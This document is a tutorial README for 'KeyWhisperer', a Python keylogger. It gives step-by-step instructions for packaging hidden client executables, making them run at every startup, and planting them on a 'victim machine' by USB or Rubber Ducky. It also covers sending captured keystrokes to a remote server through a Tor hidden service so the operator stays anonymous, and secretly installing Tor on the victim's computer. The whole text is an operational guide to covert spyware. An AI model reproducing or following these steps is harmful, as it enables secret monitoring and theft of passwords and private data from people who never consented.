Welcome to the "KeyWhisperer: Keylogger with Python" tutorial, where we'll delve into the fascinating world of keystroke monitoring using Python. In this enthralling journey, we'll explore how to create a powerful keylogger that captures keyboard strokes, opening the door to a deeper understanding of network security testing and system administration. Unravel the mysteries of Python's hidden capabilities, and let the KeyWhisperer guide you through the exciting realm of cybersecurity. Embrace the adventure and discover the limitless possibilities that await you!
In this tutorial, we will cover the following topics:
- Setting up the project environment and required libraries
- Creating a server-side script to receive keyboard strokes
- Developing a client-side script to be executed on the victim machine
- Setting up the tool to run automatically on system startup on victim machine
- Run the scripts on the victim machine
Install the source code:
git clone https://github.com/BlurryFace04/KeyWhisperer.git
cd KeyWhisperer
Setup virtual environment in Windows (optional):
python -m venv venv
call venv\Scripts\activate
Setup virtual environment in Linux (optional):
python3 -m venv venv
source venv/bin/activate
Install libraries:
pip install -r requirements.txt
It is highly recommended to consider renting a dedicated/shared server or a virtual private server (VPS) for hosting your keylogger server script. By utilizing a rented server, you can gain remote access and control over your keylogger from any location, rather than being limited to a local area network (LAN) when using a home PC or laptop. This approach significantly enhances the flexibility and reach of your keylogger, enabling more efficient monitoring and management across various network environments.
For this tutorial, we will be using an Ubuntu Server.
Once you have set up your server environment, ensure that your server script is uploaded to the server. Then, initiate the server script by executing the following command:
python3 server.py
Upon successful execution, your server will be up and running, actively listening for incoming connections from your keylogger clients.
Once connected, it will be saving the key logs in a file named "whispered.txt".
To prepare the client script for execution on the target machine, you'll need to convert it into an executable (.exe) file using PyInstaller. This process makes it easier to run the script on the target system without even requiring a separate Python installation on the target machine.
Change the Server IP Address and run the following command to convert your client script into a standalone executable:
pyinstaller --onefile --noconsole --icon=icon.ico client.py
Note: The client script provided can be executed on both Windows and Linux operating systems.
In order to ensure that the keylogger runs automatically every time the target system starts, you can use the startup script.
Run the following command to convert your startup script into a standalone executable:
pyinstaller --onefile --noconsole --icon=icon.ico startup.py
This will copy the client.exe file to any desired location which can be edited in the startup script and create a shortcut to the client.exe file in the Windows Startup folder, ensuring that the keylogger runs every time the system starts.
After generating the executable files, you will find the client.exe and startup.exe files within the dist folder created by PyInstaller.
To deploy the keylogger on the target machine, transfer both files using an appropriate method, such as a USB flash drive, a Rubber Ducky, or another suitable technique.
Once connected to the target system, execute both the executables to initiate the keylogging process.
If using a USB flash drive, simply execute the client.exe and startup.exe files. This will initiate the keylogger and copy the client.exe file to the pre-defined location on the target system and create a shortcut in the Windows Startup folder, ensuring the keylogger is launched each time the system starts.
You can create a script for Rubber Ducky using the following steps:
- Use the payload.txt provided in the source code and create a inject.bin (binary payload file) from Hak5 PayloadStudio
- Copy the inject.bin, client.exe and startup.exe files to the root of the Rubber Ducky's microSD card.
- Insert the Rubber Ducky into the target system and the payload script will automatically execute both the executables.
UPDATE: These are some additional steps if you wanna enable the client-server communication via TOR:
Setup TOR Hidden Service on Server
You might have noticed that in the client script we have explicitly mentioned our Server IP Address, which is a potential vulnerability. So to anonymize the server, we will be using the tor network to establish communication between the client and the server.
Note: Using Tor Hidden Service is optional but is highly recommended for your anonymity.
Let's procees to the installation part.
Install tor using the following command:
sudo apt install tor -y
Next, edit the Tor configuration file, torrc. The file is located at '/etc/tor/torrc'.
sudo nano /etc/tor/torrc
Uncomment or add the following lines:
SocksPort 9050
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:8084
Finally, restart Tor so it picks up your new configuration:
sudo systemctl restart tor
The hostname of your hidden service will be in '/var/lib/tor/hidden_service/hostname'. You can display it with:
sudo cat /var/lib/tor/hidden_service/hostname
Save this onion address because it will be used in the next step.
This install_tor script will secretly download, extract, and configure Tor without installing it as a service on the victim machine. Run the following command to convert your install_tor script into a standalone executable:
pyinstaller --onefile --noconsole --icon=icon.ico install_tor.py
Note: This script can only be used on a windows machine.
You will have to use this tor_client script instead of the client script we used before, if you want to enable the commnication of server and client via tor network.
Replace the 'ONION_ADDRESS' in the script with the onion address you noted in the previous step.
Run the following command to convert your tor_client script into a standalone executable:
pyinstaller --onefile --noconsole --icon=icon.ico tor_client.py
Note: You can keep using the same server script even for communication via tor.
You will have to replace the client.exe with the tor_client.exe, and also add the install_tor.exe in your pendrive or Rubber Ducky (whichever you are using) which will be executed on the victim machine.
If you find bugs or have suggestions about improving KeyWhisperer, don't hesitate to contact me.
This project is licensed under the MIT License - see the LICENSE file for details
Copyright (c) 2023 Blurry Face